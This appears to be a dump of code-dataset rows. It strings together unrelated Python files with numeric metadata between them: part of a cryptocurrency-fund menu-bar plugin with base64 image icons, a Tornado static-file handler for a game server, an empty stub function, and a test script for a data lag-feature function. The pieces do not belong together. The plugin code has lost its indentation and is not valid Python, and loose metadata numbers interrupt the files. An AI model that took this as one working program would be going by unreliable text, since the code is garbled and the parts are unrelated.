AQXtTGwu2WZuzDAeq2WPgbV367Q8G09fUek3BUAnp9EUuz12g08IQIV1eHfTdu3BKvS07M1pAwY1FkRZaDzs5OYNn+arxjMkFQUDAm2QBt90z3ojuvtVICOTk5Hgl4zYEi0lgyMzOFq1evyk9fuLx956d71/b29YU6JikDkpcsVtFkYxCD4hMWQWHZOVgwNxbu3msDC3CQMHO6cL+9k2lpaq44bQbzwEFIWrqLRwK0q1HwQ8eLZn9/+txJa68tTsQiOVE76NdmQFi4GtvtduluIyIiYPLKdNzc3IgCZ8yG+dOiRLtD8Kmuquy2tLZ+RSG12npcXOwOTlfcCJB7ZgwEfO+BvKSGhluXbA5e5iT367Q/Ao0mXFyYlIR4XpDAyfWA0+kApVKJdDodyQNMw4xqf7kM12trt544caSRdkri0+PpKQG3HCCbpbvyYSBewKLBj2O3TJ+q/hpE8c7KV9MZf9JseN5J+k1/ctOR5CJYrTbag3DDX/XobElZ7rH8Qz8CAS8uLvYKTgl4FBqFxxUf7/umsqmXx62PRP6W2YYbu+2DD31vtWOhtqEFb/vwk+8GbCnDfpaPOxv27gZEdYQALTda9xx5fOlaAN9x6mJJCXRaepHfJBkJSP9Xlo4y2STc3tbGFOTnw4ypkYfpfpLE1LfHzKd6lwx+yVwLw0ej0SjWpBhxrhHw+UzuDXXvvqTyGyQdFVEoQh0KpPNijuPA1mfFR7/NE7rMFkYml5t/ra668OCBlm1pMfazHO70sbnHCLj2kM7DIAOI1sKsuJ6e1t3+c56Dd57fh/qqN8DZC+exiABhLKDCEz8wjU3NWKlUwP2OTjW1DwmpG/P0dJ9bFdDFIZFyQYSHd9eqAsxMB8PwLERzKxJv4r+Naaji7lELq1R2325sckwJDop2OJygkvtJSeel6oZcD8xGjQAYQHLmI+Pm2swWYJycKPA9Tvm//mh++JpCk2Cb0/N77YLUlCWrfX18uhmGISUp/4f6TtFqx0xAum/0COhJmRaDIHLsQz9GBvyf3b4qPzk42Liya9tPbdqPkI06gQMH2nfsMRTwGN5XhwWW0qUUANFIJ2OIVwL0I0REigAKi9nrsJvVvo96FU5V5DHZpp/y4T1EMl3PXuxazuRlZTknT/avE7FQsXPz5ptAm9nT/IxScEq8pqYmAHv52XTtcY1HSNs+WFAQTe1ca3Q+bqEfIWr0c2lpcnl5+Xo6r6kxcCSlJVK4CNxKdzjg8Dm1HUtGXAE1pmGvqKgIdDqFZBHEG1VVtaFLlybflxyTXosy+xNzuGNiQ9QY0d8uImPW/nDbEQRcCp7n1wGDTcTnrNTUpCq6TkFcek/jgH7UPZ7sBsuQhp46OXPmzGoyMixiI3o57jhdk07vyXoC1qQIUAAiQllZWRQ5/TTS30vJL5ZifUZGF9ExRDeusI6Hl0SAnpIakb7eYbVa88jPiFTfpJSeKbhXohT4WYbdK/CA4ola6FhOnlT/Hxh0tLJyBDVNAAAAAElFTkSuQmCC',
'WAVES': 'iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAAXNSR0IArs4c6QAAAAlwSFlzAAAWJQAAFiUBSVIk8AAAAVlpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IlhNUCBDb3JlIDUuNC4wIj4KICAgPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4KICAgICAgPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIKICAgICAgICAgICAgeG1sbnM6dGlmZj0iaHR0cDovL25zLmFkb2JlLmNvbS90aWZmLzEuMC8iPgogICAgICAgICA8dGlmZjpPcmllbnRhdGlvbj4xPC90aWZmOk9yaWVudGF0aW9uPgogICAgICA8L3JkZjpEZXNjcmlwdGlvbj4KICAgPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4KTMInWQAAB6dJREFUWAmtV2tsXMUVnrn37sO762e8PBw7tURDf5QGqhjJpapE0gJFcX9FKaIRVehDDVULojzkKKQEAT/aCip+WZVSQVuaIFsVVMFSIxHs4NhBKIX0kQhIBLbrXWftfd5933vnDt+53tnsGtsyUke6nrkzZ873ne+cmbtm7As0KaWmzP9jlh4bm11895WP5j6YiqVPYm0HrY1KqSub/2uvwNHrZ3O5kacvL8h7py/Ku6b+K++e+Vi+dGk+lpJykED3jY5umoSxGZYA5Wgu2U6ls8dOJs0DH8SSTqdmaLbLWaladY9X3J6yPf+3gpQ/jHB+ejN+yaYu6UYbXpmdDdD66URyZDxZOHAhnnG6NN0ou0yrCK65rjRaLMv582Kl56UL8b8uS7lTSqjQkLL1/G9IQMl+oL+fzaRzf3o9kT3471hStHNuFBG5IzizJWMWtLGlZnQIIQ5/mrr+jxfik2m2bzeDakcn5IYqr7tI4Er2mUz22BtL5v5PUnkR0TS9CEApNCZcyRw8ArVpY04IqQ/ohhi+YkaKJXE8I+W+Ts4n941Kfez7XKylwpoEVM6pn0ybvx+LJfd/lMyLMHJeclzmugBE5AKgTg2c1BCYs11Xv4Vr4tn/Vbp903NvgsQQkSAlju7izmoSaxJ4ZnJSB3hoKpl94R/p/E8IHIWll4FAkTuSIkcKFLhHhBSgVICIYPp26Ypff2KFS+7C2FVpfe8Gzt9FTXCkBTSvNX5tCFlXqh2dDP4rWxh/eSGx+8NkQbRpXCsJJJRy7snu5RwEoABicuDXBjmPlFcbK3N+VxOzFtcP9wcLw7tv/G2E+Z7jnDURaCrCSUROhN7P5H45djWz+8NU3m5DzkuCcZLbIkAAoOAYeLCKw9y8DV5CulTwNqWG7MgGT85lep8uxfOXq5Fj5xJPIMSvk38EWMetD2hBtbIj5lv8PlaFxhasBUVFMgPVJiNkYq4iWWswon25PayZWlC76kihw6YKWxeKOF66GCtRvjjB8DT+ZGk7Wl2Feg0Ahy4br0i+Ge06xXXzaDYaPXo2kZQd3JCWkChjOBKamLaE/uSNEbarr/1Y0NAuXEoUHzwRD+w8m8w7X9I0I4ta0F1cA67jpHjYOHSzsfDQN3oeAnDRg8cyeg/LU4DAMeHVQ7VaPVwqVubuCAf+eXdf+/Dt0ev5XNVhBlwKwUXM1fVDN7Q6P77lup/eFfXbt4e1n/381s6RH/X7X/9WZ5cxZzHRRoUmpJPlEWP4Ju3K8J09B/OJxC+WlpanC4XCbRTo+fPnfR6ZxnzYtv2M4ziyWCjKYrEoEfbBM5niU4+8vyi3v3lJ7jz1qXx8ZnYh5sj7zFz+78VSWeZyORlPJKp2uXzk5Fx2/Gtjc5L94WPJXp6XR6YWr5SkszcRj0+nMxkZi8VkPB5PLy8v7yLwiYkJo34KLMsa8fl8B1OpFOXCRaXoHVs6Ibr23Kkl8/Lxi4u/6W8NLzw80HvIWE4/HmwP3wNbB9nE0dL0UEuIhVt8j5xOya+8eDb24L3bwpcfHez5XXJ56Qjj+s2mmbMpWB3NMAzoqO/t6el5gxOLwcHBV4PB4H1wKDQ0Sgke6eKSb+/o0KRtj9iaNqpr8jqrZB32B3070hnT5tL1wYyyh/TYWqS1nQUM9pcC84+FdXdH0cz/CrdlV7lScRCpsWKL5CA4BMv8fv9eXi6XdwH87XQ6bSNyzyEZ1owlrnfW1tbGoVAVhAKwYaVSGWUm6bKiM0WHwutgy0OhMIpP4CCJFtqLlOJsMHywqCNzz7cAAVJinpum2Y3BDBxvL5Xo0EiPaY1AfQPedXJC6cGYVPLWGpyu2AJe4ivpurg8Vm49UlP58Xr4cbq6ugzU3POq8r8KphNgHK1UKvTRWInuGuO1wdYg0UiocaxIAEOBn+jr6/sBRWIEAoGLYDuE9OdJGswRiSbWje80pkZOVb96TO+kGD00rr03gdNe+uR6ZzIUCr0HAvfgKSAlHgm1sRFEzTU6pnVqao36xkbvJHtHRwfJ7kVes9e8i2hgYMCmiwEkzoHAHhCoKBI1wybnBK5aI6gCXj1H4J2dnQb610h2BU715BGgCUWitbX1HRyP7+KcFunMwhkdmzqB1cA1Z946jRU5tYdyTuCosde2bt16f82+/mOnToAWFImWlpYzUGAI9VAlEljyaqK2uYmMAlJrqqd5ipyqncB7e3s/B062TQRoQpGAEpNIxxDwq+jXVEKBr9Ur2TcCJ7z6VUwvjQ1ODSrQbDb7bXygxlE8ATirH9HVoLRXzW0WnPZ8TgGapKZOByr3NFQYQkqs1UqQHYGqnsYKHLk/vp7s3oban3UJ0LpKR3d391sgsAdELBCr1wTA6lE3gtcKbj/5wHy94Oh9dduQABk3ksCFtYcKk0jAcVNhqsjxzTixmcgVEe/Lp17W64kEAA1SAiS800H3BEDxK9zFd0cIqnaSfdu2bd45H8X/hyB67cJYx7lXhCQT1ul3QPMV1rAJNrC94sc3q5pIJL5DMoPEFoAyOqko0lcR+QMNWzY15CmZakuzdHU7HK+3A+D086kdj4WnDKI2vpy9mUxmP4jgAg29F41Gx9V+U8ot9Gu9i/Ocmluv/wzCxwuJXKQp/AAAAABJRU5ErkJggg==',
'PPT': 'populous',
'STRAT': 'stratis',
'BTS': 'bitshares',
'ARK': 'ark',
'BTG': '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'
}
def update_c20():
if result['presale'] > 0 and result['usd_value'] > 0:
# calculate btg nav
btg_val = int(float(btg_result[0]['price_usd']) * 458)
btg_nav = float(btg_val) / float(result['presale']) * 0.98 * 0.87
# add on top of current nav
net_asset_value = float(result['nav_per_token']) + btg_nav
usd_value = net_asset_value * number_of_c20
print '| templateImage={}'.format(symbol_image_map['C20'])
print '---'
# print nav, value of your coins, and total fund value
print 'NAV:\t\t${:.4f}\nHoldings:\t${:,}\nFund:\t\t${:,}'.format(net_asset_value, int(usd_value), btg_val + int(result['usd_value']))
# print number of c20 you have
print 'C20:\t{:.4f} | image={}'.format(number_of_c20, symbol_image_map['C20'])
# separator bitbar recognizes and puts everything under it into a menu
print '---'
# print holdings
holdings = result['holdings'];
holdings.append({'name': 'BTG', 'value': btg_val})
for holding in holdings:
crypto_name = holding['name']
crypto_value = float(holding['value'])
crypto_percentage = crypto_value/float(result['usd_value'])*100
crypto_price = float(symbol_price[symbol_path_map[crypto_name]])
print '{:s}:\t{:.2f}%\t${:,}\t${:,.2f} | image={}'.format(crypto_name,
crypto_percentage, holding['value'], crypto_price,
symbol_image_map[crypto_name])
update_c20()
| 629.455285
| 4,629
| 0.954936
| 2,331
| 77,423
| 31.689404
| 0.840412
| 0.14044
| 0.153558
| 0.00069
| 0.002735
| 0.002247
| 0.002247
| 0.001191
| 0.001191
| 0
| 0
| 0.1421
| 0.010527
| 77,423
| 122
| 4,630
| 634.614754
| 0.822133
| 0.007465
| 0
| 0.10989
| 0
| 0.241758
| 0.972588
| 0.963711
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.021978
| null | null | 0.065934
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
acbd10ef0c83be880d8959765de7ef18ed70b468
| 1,887
|
py
|
Python
|
crawl-ref/source/webserver/game_data_handler.py
|
Hellmonk/posthellcrawl
|
362cdb2e511a451683f4754f147d5e737658cc84
|
[
"CC0-1.0"
] | 21
|
2016-11-03T13:52:57.000Z
|
2021-06-25T07:51:20.000Z
|
crawl-ref/source/webserver/game_data_handler.py
|
Implojin/hellcrawl
|
cbb74c842c7b3f85492c75484174de947c2a5014
|
[
"CC0-1.0"
] | 34
|
2017-01-31T11:33:10.000Z
|
2018-09-25T07:34:59.000Z
|
crawl-ref/source/webserver/game_data_handler.py
|
Implojin/hellcrawl
|
cbb74c842c7b3f85492c75484174de947c2a5014
|
[
"CC0-1.0"
] | 6
|
2017-01-04T03:21:49.000Z
|
2021-02-15T02:30:39.000Z
|
import tornado.web
import os.path
import config
class GameDataHandler(tornado.web.StaticFileHandler):
def initialize(self):
super(GameDataHandler, self).initialize(".")
def head(self, version, path):
self.get(version, path, include_body=False)
def get(self, version, path, include_body=True):
if version not in GameDataHandler._client_paths:
raise tornado.web.HTTPError(404)
self.root = GameDataHandler._client_paths[version]
super(GameDataHandler, self).get(path, include_body)
def set_extra_headers(self, path):
if config.game_data_no_cache:
self.set_header("Cache-Control",
"no-cache, no-store, must-revalidate")
self.set_header("Pragma", "no-cache")
self.set_header("Expires", "0")
_client_paths = {}
@classmethod
def add_version(cls, version, path):
cls._client_paths[version] = os.path.abspath(path)
class MorgueHandler(tornado.web.StaticFileHandler):
def initialize(self):
super(MorgueHandler, self).initialize(".")
def head(self, version, path):
self.get(version, path, include_body=False)
def get(self, version, path, include_body=True):
if version not in MorgueHandler._client_paths:
raise tornado.web.HTTPError(404)
self.root = MorgueHandler._client_paths[version]
super(MorgueHandler, self).get(path, include_body)
def set_extra_headers(self, path):
if config.game_data_no_cache:
self.set_header("Cache-Control",
"no-cache, no-store, must-revalidate")
self.set_header("Pragma", "no-cache")
self.set_header("Expires", "0")
_client_paths = {}
@classmethod
def add_version(cls, version, path):
cls._client_paths[version] = os.path.abspath(path)
| 33.105263
| 66
| 0.647589
| 224
| 1,887
| 5.276786
| 0.21875
| 0.07445
| 0.076142
| 0.07445
| 0.800338
| 0.800338
| 0.800338
| 0.717428
| 0.717428
| 0.639594
| 0
| 0.005563
| 0.237944
| 1,887
| 56
| 67
| 33.696429
| 0.816412
| 0
| 0
| 0.697674
| 0
| 0
| 0.075252
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.232558
| false
| 0
| 0.069767
| 0
| 0.395349
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a0a800c4a1499ac4aaad12249fceb5a281cec43
| 28
|
py
|
Python
|
src/zig/utilities.py
|
rx-gan/zig
|
5bdbbbda85ff3ac85a0c7a91dc54d995602f9a96
|
[
"MIT"
] | null | null | null |
src/zig/utilities.py
|
rx-gan/zig
|
5bdbbbda85ff3ac85a0c7a91dc54d995602f9a96
|
[
"MIT"
] | null | null | null |
src/zig/utilities.py
|
rx-gan/zig
|
5bdbbbda85ff3ac85a0c7a91dc54d995602f9a96
|
[
"MIT"
] | 1
|
2021-07-14T15:37:38.000Z
|
2021-07-14T15:37:38.000Z
|
def generate_id():
pass
| 9.333333
| 18
| 0.642857
| 4
| 28
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 28
| 2
| 19
| 14
| 0.809524
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
4a1c8ae6984ae9ec1b616c78517f0e10ca2113e3
| 19,020
|
py
|
Python
|
tests/FeatureEngineering_QA.py
|
SeanBenner/RetroFit
|
1417775c2154c2127b3dedaf133f8f21d5f1adfa
|
[
"MIT"
] | null | null | null |
tests/FeatureEngineering_QA.py
|
SeanBenner/RetroFit
|
1417775c2154c2127b3dedaf133f8f21d5f1adfa
|
[
"MIT"
] | null | null | null |
tests/FeatureEngineering_QA.py
|
SeanBenner/RetroFit
|
1417775c2154c2127b3dedaf133f8f21d5f1adfa
|
[
"MIT"
] | null | null | null |
# QA: Test FE0_AutoLags
import timeit
import datatable as dt
import polars as pl
import retrofit
from retrofit import FeatureEngineering as fe
## No Group Example: datatable
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoLags(data=data, ArgsList=None, LagPeriods=1, LagColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=None, ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data1 = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data1.names)
print(ArgsList)
# # Args
# ArgsList=None
# LagPeriods=1
# LagColumnNames='Leads'
# DateColumnName='CalendarDateColumn'
# ByVariables=None
# ImputeValue=-1
# Sort=True
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
## No Group Example: polars
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoLags(data=data, ArgsList=None, LagPeriods=1, LagColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=None, ImputeValue=-1.0, Sort=True, Processing='polars', InputFrame='polars', OutputFrame='polars')
t_end = timeit.default_timer()
print(t_end - t_start)
data2 = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data2.columns)
print(ArgsList)
# # Args
# data=data
# LagPeriods=1
# LagColumnNames='Weekly_Sales'
# DateColumnName='CalendarDateColumn'
# ByVariables=['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# ImputeValue=-1.0
# Sort=True
# Processing='polars'
# InputFrame='polars'
# OutputFrame='polars'
## Group Example, Single Lag: datatable
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoLags(data=data, ArgsList=None, LagPeriods=1, LagColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data1 = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data1.names)
print(ArgsList)
# # Args
# ArgsList=None
# LagPeriods=1
# LagColumnNames='Leads'
# DateColumnName='CalendarDateColumn'
# ByVariables=['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# ImputeValue=-1
# Sort=True
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
## Group Exmaple: polars
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoLags(data=data, ArgsList=None, LagPeriods=1, LagColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], ImputeValue=-1.0, Sort=True, Processing='polars', InputFrame='polars', OutputFrame='polars')
t_end = timeit.default_timer()
print(t_end - t_start)
data2 = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data2.columns)
print(ArgsList)
# # Args
# ArgsList=None
# LagPeriods=1
# LagColumnNames='Leads'
# DateColumnName='CalendarDateColumn'
# ByVariables=['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# ImputeValue=-1.0
# Sort=True
# Processing='polars'
# InputFrame='polars'
# OutputFrame='polars'
## Group and Multiple Periods and LagColumnNames: datatable
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoLags(data=data, ArgsList=None, LagPeriods=[1,3,5], LagColumnNames=['Leads','XREGS1'], DateColumnName='CalendarDateColumn', ByVariables=['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data1 = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data1.names)
print(ArgsList)
# # Args
# ArgsList=None
# LagPeriods=[1,3,5]
# LagColumnNames=['Leads','XREGS1']
# DateColumnName='CalendarDateColumn'
# ByVariables=['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# ImputeValue=-1
# Sort=True
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
## Group and Multiple Periods and LagColumnNames: datatable
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoLags(data=data, ArgsList=None, LagPeriods=[1,3,5], LagColumnNames=['Leads','XREGS1'], DateColumnName='CalendarDateColumn', ByVariables=['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], ImputeValue=-1.0, Sort=True, Processing='polars', InputFrame='polars', OutputFrame='polars')
t_end = timeit.default_timer()
print(t_end - t_start)
data2 = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data2.columns)
print(ArgsList)
# # Args
# ArgsList=None
# LagPeriods=[1,3,5]
# LagColumnNames=['Leads','XREGS1']
# DateColumnName='CalendarDateColumn'
# ByVariables=['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# ImputeValue=-1.0
# Sort=True
# Processing='polars'
# InputFrame='polars'
